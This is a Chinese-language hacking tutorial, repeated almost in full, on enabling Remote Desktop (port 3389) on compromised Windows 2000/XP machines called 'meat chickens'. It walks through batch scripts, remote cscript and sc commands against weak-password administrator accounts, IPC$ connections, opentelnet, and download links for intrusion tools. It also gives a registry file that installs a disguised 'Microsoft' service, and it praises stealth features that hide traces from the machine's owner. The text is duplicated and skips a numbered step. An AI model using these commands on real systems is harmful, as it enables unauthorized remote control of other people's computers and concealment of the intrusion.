1.打開記事本,編輯內容如下:
echo [Components] > c:\sql
echo TSEnable = on >> c:\sql
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
編輯好后存為BAT文件,上傳至肉雞,執行。這里值得注意的是要確定winnt是否在c盤,如果在其他盤則需要改動。
2 (對xp\2000都有效) 腳本文件 本地開3389 工具:rots1.05
地址:www.netsill.com/rots.zip
使用方法:
在命令行方式下使用windows自帶的腳本宿主程序cscript.exe調用腳本,例如:
c:\>cscript ROTS.vbs <目標IP> <用戶名> <密碼> [服務端口] [自動重起選項]
服務端口: 設置終端服務的服務端口。默認是3389。
自動重起選項: 使用/r表示安裝完成后自動重起目標使設置生效。
使用/fr表示強制重起目標。(如果/r不行,可以試試這個)
使用此參數時,端口設置不能忽略。
比如掃描到了一個有NT弱口令的服務器,IP地址是222.222.222.222,管理員帳戶是administrator,密碼為空
運行CMD(2000下的DOS),我們給它開終端!
命令如下!
cscript reg.vbe 222.222.222.222 administrator "" 3389 /fr
上面的命令應該可以理解吧?cscript reg.vbe這是命令,后面的是IP,然后是管理員帳戶,接這是密碼,因為222.222.222.222 這臺服務器的管理員密碼是空的,那就用雙引號表示為空,再后面是端口,你可以任意設置終端的端口,/fr是重啟命令(強制重啟,一般我都用這個,你也可以 /r,這是普通重啟)
腳本會判斷目標系統類型,如果不是server及以上版本,就會提示你是否要取消。
因為pro版不能安裝終端服務。
如果你確信腳本判斷錯誤,就繼續安裝好了。
如果要對本地使用,IP地址為127.0.0.1或者一個點(用.表示),用戶名和密碼都為空(用""表示)。
腳本訪問的目標的135端口,如果目標135端口未開放,或者WMI服務關閉,那么腳本就沒用了。
3,下載3389自動安裝程序-djshao正式版5.0
地址www.netsill.com/djshao.zip
說明:
解壓djshao5.0.zip,用你的隨便什么方法把把解壓出來的djxyxs.exe上傳到肉雞的c:\winnt\temp下,然后進入c:\ winnt\temp目錄執行djxyxs.exe解壓縮文件,然后再執行解壓縮出來的azzd.exe文件,等一會肉雞會自動重啟!重啟后會出現終端服 務!
特點:1、不用修改注冊表的安裝路徑,注冊表會自動修改,安裝完后會自動恢復到原來的安裝路徑,2、在后臺安靜模式運行,就算肉雞旁有人也沒有關系!3、 在添加和刪除中看不出終端服務被安裝的痕跡,也就是啟動終端前不會打鉤,4、不會在肉雞上留下你的上傳文件,在安裝完終端服務后會會自動刪除你上傳到c: \winnt\temp下的任何文件!5、不管肉雞的winnt裝在什么盤上都無所謂!6、安裝完終端后會刪除在管理工具中的終端快捷圖標!7、在沒有安 裝終端前,終端服務是被禁止的!安裝終端后,終端服務被改為自動!但是如果在安裝前終端服務是手動!安裝后就可能還是手動!等重啟后就不會打開服務!所以 在軟件中加了sc指令,等安裝完后,不管終端服務是禁止還是手動還是自動,全部改為自動。8、自動檢測肉雞是不是服務器版,如果不是刪除原文件,不執行安 裝,如果是服務器版就執行安裝!9、支持中日韓繁四個版本的win2000服務器版!
4.下載DameWare NT Utilities 3.66.0.0 注冊版
地址www.netsill.com/dwmrcw36600.zip
安裝注冊完畢后輸入對方IP用戶名密碼,等待出現是否安裝的對話框點是。
復制啟動后出現對方桌面。
在對方桌面進入控制面版,點添加或刪除程序。進入后點添加/刪除windows組件,找到終端服務,點際進入后在啟動終端服務上打上勾。確定自動提示重起,重起后OK。
5.
首先我們制作開啟3389的工具
先把下面的注冊表內容copy一份,另存為3389.reg注冊表文件
注冊表內容:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache]
"Enabled"="0"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"ShutdownWithoutLogon"="0"
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
"EnableAdminTSRemote"=dword:00000001
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"TSEnabled"=dword:00000001
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD]
"Start"=dword:00000002
[HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle]
"Hotkey"="1"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecuService]
"Start"=dword:00000002
"ErrorControl"=dword:00000001
"ImagePath"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,\
74,00,25,00,5c,00,53,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,65,\
00,76,00,65,00,6e,00,74,00,6c,00,6f,00,67,00,2e,00,65,00,78,00,65,00,00,00
"ObjectName"="LocalSystem"
"Type"=dword:00000010
"Description"="Microsoft"
"DisplayName"="Microsoft"
再把下面的內容保存為批處理文件3389.bat
安裝批處理內容:
copy termsrv.exe eventlog.exe
regedit.exe /s 3389.reg
del 3389.reg
del 3389.exe
del 3389.bat
用winrar制作成exe自解壓縮包
61.188.***.*** user:administrato pass:空
先使用工具letmein判斷其操作系統
letmein \\ip -all -d
TsInternetUser (TsInternetUser)這個是2000的終端用戶,現在可以判斷其為2000server了
再使用終端登陸軟件看看他的3389是不是已經開啟了免了費事折騰
應該沒有開啟了
建立ipc連接
copy工具過去
net use \\ip\ipc$ "pass" /user:name
copy file \\ip\admin$\system32
用opentelnet開對方的telnet
opentelnet \\ip name pass 1 99
用telnet進入
進入到對方的winnt\system32\
目錄
解壓縮3389.exe
運行安裝批處理3389.bat
現在我們把對方重起一下,用reboot
7.
檢查對方是否真的禁用了Terminal server
C:\>sc \\xxx.xxx.xxx.xxx qc termservice
[SC] GetServiceConfig SUCCESS
SERVICE_NAME: termservice
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 4 DISABLED
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\WINNT\System32\termsrv.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Terminal Services
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
仔細看 START_TYPE一項,顯示對方該服務的啟動模式為“DISABLED”也就是“禁用”。
C:\>sc \\xxx.xxx.xxx.xxx config termservice start= auto
[SC] ChangeServiceConfig SUCCESS
好了,現在我們已經把對方終端服務的啟動模式修改成自動了。
再檢查一便對方終端服務的啟動模式
C:\>sc \\TEST qc termservice
[SC] GetServiceConfig SUCCESS
SERVICE_NAME: termservice
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\WINNT\System32\termsrv.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Terminal Services
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
啟動對方的終端服務
C:\>sc \\xxx.xxx.xxx.xxx start termservice
SERVICE_NAME: termservice
TYPE : 10 WIN32_OWN_PROCESS
STATE : 2 START_PENDING
(NOT_STOPPABLE,NOT_PAUSABLE,IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x1
WAIT_HINT : 0x7530
C:\>sc \\xxx.xxx.xxx.xxx query termservice
SERVICE_NAME: termservice
TYPE : 10 WIN32_OWN_PROCESS
STATE : 4 RUNNING
(NOT_STOPPABLE,NOT_PAUSABLE,IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
echo [Components] > c:\sql
echo TSEnable = on >> c:\sql
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
編輯好后存為BAT文件,上傳至肉雞,執行。這里值得注意的是要確定winnt是否在c盤,如果在其他盤則需要改動。
2 (對xp\2000都有效) 腳本文件 本地開3389 工具:rots1.05
地址:www.netsill.com/rots.zip
使用方法:
在命令行方式下使用windows自帶的腳本宿主程序cscript.exe調用腳本,例如:
c:\>cscript ROTS.vbs <目標IP> <用戶名> <密碼> [服務端口] [自動重起選項]
服務端口: 設置終端服務的服務端口。默認是3389。
自動重起選項: 使用/r表示安裝完成后自動重起目標使設置生效。
使用/fr表示強制重起目標。(如果/r不行,可以試試這個)
使用此參數時,端口設置不能忽略。
比如掃描到了一個有NT弱口令的服務器,IP地址是222.222.222.222,管理員帳戶是administrator,密碼為空
運行CMD(2000下的DOS),我們給它開終端!
命令如下!
cscript reg.vbe 222.222.222.222 administrator "" 3389 /fr
上面的命令應該可以理解吧?cscript reg.vbe這是命令,后面的是IP,然后是管理員帳戶,接這是密碼,因為222.222.222.222 這臺服務器的管理員密碼是空的,那就用雙引號表示為空,再后面是端口,你可以任意設置終端的端口,/fr是重啟命令(強制重啟,一般我都用這個,你也可以 /r,這是普通重啟)
腳本會判斷目標系統類型,如果不是server及以上版本,就會提示你是否要取消。
因為pro版不能安裝終端服務。
如果你確信腳本判斷錯誤,就繼續安裝好了。
如果要對本地使用,IP地址為127.0.0.1或者一個點(用.表示),用戶名和密碼都為空(用""表示)。
腳本訪問的目標的135端口,如果目標135端口未開放,或者WMI服務關閉,那么腳本就沒用了。
3,下載3389自動安裝程序-djshao正式版5.0
地址www.netsill.com/djshao.zip
說明:
解壓djshao5.0.zip,用你的隨便什么方法把把解壓出來的djxyxs.exe上傳到肉雞的c:\winnt\temp下,然后進入c:\ winnt\temp目錄執行djxyxs.exe解壓縮文件,然后再執行解壓縮出來的azzd.exe文件,等一會肉雞會自動重啟!重啟后會出現終端服 務!
特點:1、不用修改注冊表的安裝路徑,注冊表會自動修改,安裝完后會自動恢復到原來的安裝路徑,2、在后臺安靜模式運行,就算肉雞旁有人也沒有關系!3、 在添加和刪除中看不出終端服務被安裝的痕跡,也就是啟動終端前不會打鉤,4、不會在肉雞上留下你的上傳文件,在安裝完終端服務后會會自動刪除你上傳到c: \winnt\temp下的任何文件!5、不管肉雞的winnt裝在什么盤上都無所謂!6、安裝完終端后會刪除在管理工具中的終端快捷圖標!7、在沒有安 裝終端前,終端服務是被禁止的!安裝終端后,終端服務被改為自動!但是如果在安裝前終端服務是手動!安裝后就可能還是手動!等重啟后就不會打開服務!所以 在軟件中加了sc指令,等安裝完后,不管終端服務是禁止還是手動還是自動,全部改為自動。8、自動檢測肉雞是不是服務器版,如果不是刪除原文件,不執行安 裝,如果是服務器版就執行安裝!9、支持中日韓繁四個版本的win2000服務器版!
4.下載DameWare NT Utilities 3.66.0.0 注冊版
地址www.netsill.com/dwmrcw36600.zip
安裝注冊完畢后輸入對方IP用戶名密碼,等待出現是否安裝的對話框點是。
復制啟動后出現對方桌面。
在對方桌面進入控制面版,點添加或刪除程序。進入后點添加/刪除windows組件,找到終端服務,點際進入后在啟動終端服務上打上勾。確定自動提示重起,重起后OK。
5.
首先我們制作開啟3389的工具
先把下面的注冊表內容copy一份,另存為3389.reg注冊表文件
注冊表內容:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache]
"Enabled"="0"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"ShutdownWithoutLogon"="0"
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
"EnableAdminTSRemote"=dword:00000001
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"TSEnabled"=dword:00000001
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD]
"Start"=dword:00000002
[HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle]
"Hotkey"="1"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecuService]
"Start"=dword:00000002
"ErrorControl"=dword:00000001
"ImagePath"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,\
74,00,25,00,5c,00,53,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,65,\
00,76,00,65,00,6e,00,74,00,6c,00,6f,00,67,00,2e,00,65,00,78,00,65,00,00,00
"ObjectName"="LocalSystem"
"Type"=dword:00000010
"Description"="Microsoft"
"DisplayName"="Microsoft"
再把下面的內容保存為批處理文件3389.bat
安裝批處理內容:
copy termsrv.exe eventlog.exe
regedit.exe /s 3389.reg
del 3389.reg
del 3389.exe
del 3389.bat
用winrar制作成exe自解壓縮包
61.188.***.*** user:administrato pass:空
先使用工具letmein判斷其操作系統
letmein \\ip -all -d
TsInternetUser (TsInternetUser)這個是2000的終端用戶,現在可以判斷其為2000server了
再使用終端登陸軟件看看他的3389是不是已經開啟了免了費事折騰
應該沒有開啟了
建立ipc連接
copy工具過去
net use \\ip\ipc$ "pass" /user:name
copy file \\ip\admin$\system32
用opentelnet開對方的telnet
opentelnet \\ip name pass 1 99
用telnet進入
進入到對方的winnt\system32\
目錄
解壓縮3389.exe
運行安裝批處理3389.bat
現在我們把對方重起一下,用reboot
7.
檢查對方是否真的禁用了Terminal server
C:\>sc \\xxx.xxx.xxx.xxx qc termservice
[SC] GetServiceConfig SUCCESS
SERVICE_NAME: termservice
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 4 DISABLED
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\WINNT\System32\termsrv.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Terminal Services
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
仔細看 START_TYPE一項,顯示對方該服務的啟動模式為“DISABLED”也就是“禁用”。
C:\>sc \\xxx.xxx.xxx.xxx config termservice start= auto
[SC] ChangeServiceConfig SUCCESS
好了,現在我們已經把對方終端服務的啟動模式修改成自動了。
再檢查一便對方終端服務的啟動模式
C:\>sc \\TEST qc termservice
[SC] GetServiceConfig SUCCESS
SERVICE_NAME: termservice
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\WINNT\System32\termsrv.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Terminal Services
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
啟動對方的終端服務
C:\>sc \\xxx.xxx.xxx.xxx start termservice
SERVICE_NAME: termservice
TYPE : 10 WIN32_OWN_PROCESS
STATE : 2 START_PENDING
(NOT_STOPPABLE,NOT_PAUSABLE,IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x1
WAIT_HINT : 0x7530
C:\>sc \\xxx.xxx.xxx.xxx query termservice
SERVICE_NAME: termservice
TYPE : 10 WIN32_OWN_PROCESS
STATE : 4 RUNNING
(NOT_STOPPABLE,NOT_PAUSABLE,IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0